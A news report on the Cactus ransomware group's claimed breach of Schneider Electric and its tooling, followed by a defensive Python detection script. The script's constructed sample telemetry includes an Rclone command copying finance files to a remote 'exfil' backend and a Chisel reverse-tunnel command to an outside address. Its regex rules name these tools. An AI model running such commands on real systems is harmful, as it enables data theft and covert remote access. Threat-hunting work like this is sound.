Cactus ransomware group steals 1.5 TB of data from Schneider Electric, which specializes in energy and automation.

The Cactus ransomware group claims to have stolen 1.5 TB of data from energy management and industrial automation firm Schneider Electric.

Schneider Electric is a global company specializing in energy management, industrial automation and digital transformation.

In January of this year, BleepingComputer reported a cyberattack that took place on January 17 against the company's Sustainability Business division. Schneider Electric confirmed the incident when BleepingComputer contacted it. The attack disrupted the division's cloud-based Resource Advisor platform; the company says no other business units were affected.

Today, the Cactus group published 25 MB of allegedly stolen data on its Tor leak site. As proof of the breach, the group also posted several images of passports and internal company documents.

Kroll researchers reported that the Cactus ransomware group has been active since March 2023. Its distinguishing trait is that the ransomware executable is itself stored encrypted: the binary is only decrypted and run when the operator supplies the correct key as a command-line argument, which hinders static antivirus analysis of the payload.

Cactus operators use SoftPerfect Network Scanner (netscan) to find additional targets on the network and PowerShell commands to enumerate endpoints.

The operators identify user accounts by reviewing successful logon events in Windows Event Viewer (Event ID 4624) and also run a modified version of the open-source PSnmap scanner. For remote access they rely on legitimate tools such as Splashtop, AnyDesk and SuperOps RMM, and they use Cobalt Strike and the Chisel tunnelling proxy for post-exploitation activity.

Once they have escalated privileges on a machine, the attackers run a batch script that uninstalls popular antivirus products. Cactus uses Rclone to exfiltrate data and a PowerShell script called TotalExec, previously seen in Black Basta ransomware operations, to automate deployment of the encryptor.
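The tooling described in the last three paragraphs (netscan and PSnmap for discovery, logon-event review, RMM tools and Chisel for access, Rclone for exfiltration, TotalExec for encryptor deployment) is mostly made up of legitimate or dual-use programs, so no single sighting is conclusive; what a defender should hunt for is the combination on one host. The script below is an added example for this post, not Cactus code or any vendor's detection content. It runs simple command-line rules over process-creation telemetry (Sysmon event 1 or Windows 4688 style) and rolls hits up per host. The event records and the field names (host, ts, user, image, cmdline) are constructed, and each regex is an assumption about how the tool's invocation typically looks; tune them to your own telemetry.

```python
"""Hunt for the Cactus-style tradecraft described above in process-creation
telemetry.  Added example: the events are constructed, the schema is assumed,
and each rule is an assumption about how the tool appears on a command line.
"""
import re
from collections import defaultdict

# Each rule: (kill-chain stage, rule name, regex run over "image cmdline").
RULES = [
    ("discovery", "SoftPerfect Network Scanner (netscan)",
     re.compile(r"\\netscan(?:64)?\.exe\b", re.I)),
    ("discovery", "PSnmap PowerShell scanner",
     re.compile(r"psnmap", re.I)),
    ("discovery", "Successful-logon (4624) enumeration",
     re.compile(r"(?:get-winevent|wevtutil)[^\n]*\b4624\b", re.I)),
    ("remote_access", "Remote-access tool (AnyDesk/Splashtop/SuperOps)",
     re.compile(r"\b(?:anydesk|splashtop|superops)", re.I)),
    ("tunnel", "Chisel client tunnel",
     re.compile(r"\bchisel(?:\.exe)?\s+client\b", re.I)),
    ("exfiltration", "Rclone copy to a remote backend",
     re.compile(r"\brclone(?:\.exe)?\s+(?:copy|sync|move)\s+\S+\s+\S+:", re.I)),
    ("impact", "TotalExec encryptor-deployment script",
     re.compile(r"totalexec", re.I)),
]

# Constructed telemetry for illustration, not from any real incident.
SAMPLE_EVENTS = [
    {"host": "WS-0412", "ts": "2024-06-03T02:01:10Z", "user": "CORP\\jdoe",
     "image": r"C:\Users\Public\netscan64.exe", "cmdline": "netscan64.exe"},
    {"host": "WS-0412", "ts": "2024-06-03T02:05:42Z", "user": "CORP\\jdoe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ep bypass -File C:\Users\Public\psnmap.ps1"},
    {"host": "WS-0412", "ts": "2024-06-03T02:09:03Z", "user": "CORP\\jdoe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -Command \"Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4624}\""},
    {"host": "WS-0412", "ts": "2024-06-03T02:20:55Z", "user": "CORP\\jdoe",
     "image": r"C:\Users\Public\chisel.exe",
     "cmdline": "chisel.exe client 203.0.113.10:8080 R:socks"},
    {"host": "WS-0412", "ts": "2024-06-03T03:40:12Z", "user": "CORP\\jdoe",
     "image": r"C:\Users\Public\rclone.exe",
     "cmdline": r"rclone.exe copy D:\Finance mega:exfil --transfers 8"},
    {"host": "DC-01", "ts": "2024-06-03T04:12:00Z", "user": "CORP\\svc_backup",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\temp\TotalExec.ps1"},
    {"host": "IT-ADMIN-07", "ts": "2024-06-03T09:00:00Z", "user": "CORP\\helpdesk",
     "image": r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe",
     "cmdline": "AnyDesk.exe --service"},          # legitimate helpdesk use
    {"host": "FILE-02", "ts": "2024-06-03T09:01:00Z", "user": "NT AUTHORITY\\SYSTEM",
     "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
]


def match_event(event):
    """Return the (stage, rule name) pairs that one event triggers."""
    haystack = f"{event['image']} {event['cmdline']}"
    return [(stage, name) for stage, name, rx in RULES if rx.search(haystack)]


def severity(stages):
    """Single stages are common false positives (admins use RMM tools and netscan);
    exfiltration or encryptor deployment, or several stages together, is not."""
    if "exfiltration" in stages or "impact" in stages:
        return "high"
    if len(stages) >= 2:
        return "medium"
    return "low" if stages else "none"


def hunt(events):
    """Run every rule over the events (in time order) and roll hits up per host.
    Returns {host: {"hits": [(ts, stage, rule)], "stages": set, "severity": str}}.
    Hosts with no hits are omitted."""
    per_host = defaultdict(lambda: {"hits": [], "stages": set()})
    for ev in sorted(events, key=lambda e: e["ts"]):
        for stage, name in match_event(ev):
            per_host[ev["host"]]["hits"].append((ev["ts"], stage, name))
            per_host[ev["host"]]["stages"].add(stage)
    for info in per_host.values():
        info["severity"] = severity(info["stages"])
    return dict(per_host)


if __name__ == "__main__":
    for host, info in sorted(hunt(SAMPLE_EVENTS).items()):
        print(f"{host}: {info['severity']} ({', '.join(sorted(info['stages']))})")
        for ts, stage, rule in info["hits"]:
            print(f"  {ts}  {stage:<14} {rule}")
```

On the sample data, WS-0412 moves through discovery, tunnelling and exfiltration and is rated high, DC-01 is rated high on the TotalExec launch alone, and IT-ADMIN-07's AnyDesk service is only a low-severity hit to review, which is the point: alert on the chain, triage the isolated sightings.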

In early January, Cactus also claimed to have breached Coop, one of Sweden's largest retail and grocery chains.
